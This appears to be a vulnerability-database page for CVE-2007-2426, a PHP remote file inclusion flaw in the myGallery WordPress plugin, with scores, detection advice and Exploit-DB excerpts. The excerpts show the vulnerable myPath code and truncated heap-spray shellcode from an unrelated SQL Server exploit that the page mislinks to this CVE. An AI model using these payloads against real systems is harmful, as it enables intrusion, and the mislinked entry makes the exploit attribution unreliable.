CVE-2007-2426
published 2007-05-02CVE-2007-2426: PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to…
PriorityP272high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
62.87%
99.1th percentile
PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the myPath parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wildbits | mygallery | <= 1.4b4 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →The RFI payload is delivered via the 'myPath' parameter in both GET and POST requests to mygallerybrowser.php; alert on requests where this parameter contains an external URL (http:// or ftp://). ↗
- ·Vulnerable only when PHP's 'allow_url_include' (and/or 'allow_url_fopen') is enabled, as the exploit relies on require_once() loading a remote URL supplied by the attacker. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r73m-5g7h-cj4f: PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser
ghsa_unreviewed·2022-05-01
CVE-2007-2426 [HIGH] GHSA-r73m-5g7h-cj4f: PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser
PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the myPath parameter.
VulnCheck
wildbits mygallery Improper Control of Generation of Code ('Code Injection')
vulncheck·2007·CVSS 7.5
CVE-2007-2426 [HIGH] wildbits mygallery Improper Control of Generation of Code ('Code Injection')
wildbits mygallery Improper Control of Generation of Code ('Code Injection')
PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the myPath parameter.
Affected: wildbits mygallery
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://wpscan.com/vulnerability/35a80f1b-3825-45f8-ba88-5b95681baa94/
No detection rules found.
Exploit-DB
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
exploitdb·2007-09-12
CVE-2007-4814 Microsoft SQL Server - Distributed Management Objects Buffer Overflow
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
---
Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks :
code by rgod http://www.milw0rm.com/exploits/4379
code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim ([email protected])
-->
// Heap Spray
// execute "calc.exe"
shellcode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC08
Exploit-DB
WordPress Plugin mygallery 1.4b4 - Remote File Inclusion
exploitdb·2007-04-29
CVE-2007-2426 WordPress Plugin mygallery 1.4b4 - Remote File Inclusion
WordPress Plugin mygallery 1.4b4 - Remote File Inclusion
---
AAAAAAAAA AAAAAAAA AAA AAA AAA AAAAAAAA
AAAAAAAAA AAAAAAAAA AAA AAA AAAAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAAAAAA AAA
AAA AAAAAAAAA AAAAA AAA AAA AAA AAAAA
AAA AAAAAAAA AAA AAA AAA AAA AAAAA
AAA AAA AAA AAA AAAAAAAAA AAA AAA
AAA AAA AAA AAA AAA AAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAA AAAAAAAA
# myGallery 1.2.1(myPath)Remote File Include Vulnerablity
# Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code
#########################################################
# if (!$_POST){
# $mypath=$_GET['myPath']; <---------[+]
#
# }
# else {
# $mypath=$_POST['myPath'];<---------[+]
#
#
# }
# require_once($mypath.'/wp-config.php');<---------[+]
#
No writeups or analysis indexed.
http://osvdb.org/34356http://secunia.com/advisories/25042http://www.securityfocus.com/bid/23702http://www.vupen.com/english/advisories/2007/1582https://exchange.xforce.ibmcloud.com/vulnerabilities/33955https://www.exploit-db.com/exploits/3814http://osvdb.org/34356http://secunia.com/advisories/25042http://www.securityfocus.com/bid/23702http://www.vupen.com/english/advisories/2007/1582https://exchange.xforce.ibmcloud.com/vulnerabilities/33955https://www.exploit-db.com/exploits/3814
2007-05-02
Published
Exploited in the wild